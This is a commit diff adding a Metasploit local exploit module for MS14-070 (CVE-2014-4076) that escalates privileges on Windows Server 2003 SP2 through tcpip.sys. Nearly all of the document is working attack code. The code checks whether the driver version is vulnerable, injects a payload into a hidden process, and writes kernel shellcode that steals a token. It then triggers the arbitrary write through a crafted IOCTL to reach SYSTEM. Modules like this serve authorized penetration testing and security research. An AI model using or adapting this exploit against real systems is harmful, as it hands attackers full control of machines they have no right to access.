Add in MS14-070 Priv Escalation for Windows 2003

Author: Jay Smith

modules/exploits/windows/local/ms14_070_tcpip_ioctl.rb

@@ -0,0 +1,177 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'msf/core/exploit/local/windows_kernel'
+require 'rex'
+
+class Metasploit3 < Msf::Exploit::Local
+  Rank = AverageRanking
+
+  include Msf::Exploit::Local::WindowsKernel
+  include Msf::Post::File
+  include Msf::Post::Windows::FileInfo
+  include Msf::Post::Windows::Priv
+  include Msf::Post::Windows::Process
+
+  def initialize(info={})
+    super(update_info(info, {
+      'Name'          => 'Microsoft Windows Server 2003 SP2 Arbitrary Write Privilege Escalation',
+      'Description'    => %q{
+        A vulnerability within Microsoft TCP/IP protocol driver, tcpip.sys, can allow an attacker
+        to inject memory controlled by the attacker into an arbitrary location.
+      },
+      'License'       => MSF_LICENSE,
+      'Author'        =>
+        [
+          'Matt Bergin <level[at]korelogic.com>', # Vulnerability discovery and PoC
+          'Jay Smith <jsmith[at]korelogic.com>' # MSF module
+        ],
+      'Arch'          => ARCH_X86,
+      'Platform'      => 'win',
+      'SessionTypes'  => [ 'meterpreter' ],
+      'DefaultOptions' =>
+        {
+          'EXITFUNC' => 'thread',
+        },
+      'Targets'       =>
+        [
+          ['Windows Server 2003 SP2', {} ]
+        ],
+      'References'    =>
+        [
+          ['CVE', '2014-4076'],
+          ['URL', 'https://www.korelogic.com/Resources/Advisories/KL-001-2015-001.txt']
+        ],
+      'DisclosureDate'=> 'Nov 11 2014',
+      'DefaultTarget' => 0
+    }))
+
+    register_options(
+      [
+        OptString.new('PID', [true, 'The target PID to elevate into', nil]),
+      ])
+
+  end
+
+  def check
+    if sysinfo["Architecture"] =~ /wow64/i or sysinfo["Architecture"] =~ /x64/
+      return Exploit::CheckCode::Safe
+    end
+
+    handle = open_device('\\\\.\\tcp', 'FILE_SHARE_WRITE|FILE_SHARE_READ', 0, 'OPEN_EXISTING')
+    if handle.nil?
+      return Exploit::CheckCode::Safe
+    end
+    session.railgun.kernel32.CloseHandle(handle)
+
+    file_path = get_env('WINDIR') << "\\system32\\drivers\\tcpip.sys"
+    unless file?(file_path)
+      return Exploit::CheckCode::Unknown
+    end
+
+    major, minor, build, revision, branch = file_version(file_path)
+    vprint_status("tcpip.sys file version: #{major}.#{minor}.#{build}.#{revision} branch: #{branch}")
+
+    if ("#{major}.#{minor}.#{build}.#{revision}.#{branch}" == "5.2.3790.4573.45")
+      return Exploit::CheckCode::Vulnerable
+    end
+
+    return Exploit::CheckCode::Safe
+  end
+
+  def create_proc
+    windir = session.sys.config.getenv('windir')
+    cmd = "#{windir}\\System32\\notepad.exe"
+    # run hidden
+    begin
+      proc = session.sys.process.execute(cmd, nil, 'Hidden' => true)
+    rescue Rex::Post::Meterpreter::RequestError
+      return nil
+    end
+
+    proc.pid
+  end
+
+  def exploit
+    if is_system?
+      fail_with(Exploit::Failure::None, 'Session is already elevated')
+    end
+
+    if sysinfo["Architecture"] =~ /wow64/i
+      fail_with(Failure::NoTarget, "Running against WOW64 is not supported")
+    elsif sysinfo["Architecture"] =~ /x64/
+      fail_with(Failure::NoTarget, "Running against 64-bit systems is not supported")
+    end
+
+    unless check == Exploit::CheckCode::Vulnerable
+      fail_with(Exploit::Failure::NotVulnerable, "Exploit not available on this system")
+    end
+
+    p = payload.encoded
+    new_pid = create_proc
+
+    if new_pid.nil?
+      print_warning('Unable to create a new process.')
+      return
+    end
+
+    print_status("Injecting #{p.length} bytes into #{new_pid} memory and executing it...")
+    unless execute_shellcode(p, nil, new_pid)
+      fail_with(Failure::Unknown, 'Error while executing the payload')
+    end
+
+    handle = open_device('\\\\.\\tcp', 'FILE_SHARE_WRITE|FILE_SHARE_READ', 0, 'OPEN_EXISTING')
+    if handle.nil?
+      fail_with(Failure::NoTarget, "Unable to open \\\\.\\tcp device")
+    end
+
+    print_status("Storing the shellcode in memory...")
+    this_proc = session.sys.process.open
+
+    session.railgun.ntdll.NtAllocateVirtualMemory(-1, [0x1000].pack('V'), nil, [0x4000].pack('V'), "MEM_RESERVE|MEM_COMMIT", "PAGE_EXECUTE_READWRITE")
+
+    if not this_proc.memory.writable?(0x1000)
+      vprint_error("Failed to allocate memory")
+      return nil
+    else
+      vprint_good("0x1000 is now writable")
+    end
+
+    buf = "\x00\x04\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x02\x00\x00\x22\x00\x00\x00\x04\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00"
+
+    sc = "\x60\x64\xA1\x24\x01\x00\x00\x8B\x40\x38\x50\xBB\x04"
+    sc << "\x00\x00\x00\x8B\x80\x98\x00\x00\x00\x2D\x98"
+    sc << "\x00\x00\x00\x39\x98\x94\x00\x00\x00\x75\xED\x8B\xB8\xD8"
+    sc << "\x00\x00\x00\x83\xE7\xF8\x58\xBB"
+    sc << [new_pid].pack('V')
+    sc << "\x8B\x80\x98\x00\x00\x00\x2D\x98\x00\x00\x00\x39\x98\x94"
+    sc << "\x00\x00\x00\x75\xED\x89\xB8\xD8\x00\x00\x00\x61\xBA"
+    sc << "\x39\xFF\xA2\xBA"
+    sc << "\xB9\x00\x00\x00\x00"
+    sc << "\xB8\x3B\x00\x00\x00\x8E\xE0\x0F\x35\x00"
+
+    this_proc.memory.write(0x28, "\x87\xFF\xFF\x38")
+    this_proc.memory.write(0x38, "\x00\x00")
+    this_proc.memory.write(0x1100, buf)
+    this_proc.memory.write(0x2b, "\x00\x00")
+    this_proc.memory.write(0x2000, sc)
+
+    print_status("Triggering the vulnerability...")
+    session.railgun.ntdll.NtDeviceIoControlFile(handle, nil, nil, nil, 4, 0x00120028, 0x1100, buf.length, 0, 0)
+    session.railgun.kernel32.CloseHandle(handle)
+
+    print_status("Checking privileges after exploitation...")
+
+    unless is_system?
+      fail_with(Failure::Unknown, "The exploitation wasn't successful")
+    else
+      print_good("Exploitation successful!")
+    end
+
+  end
+
+end
+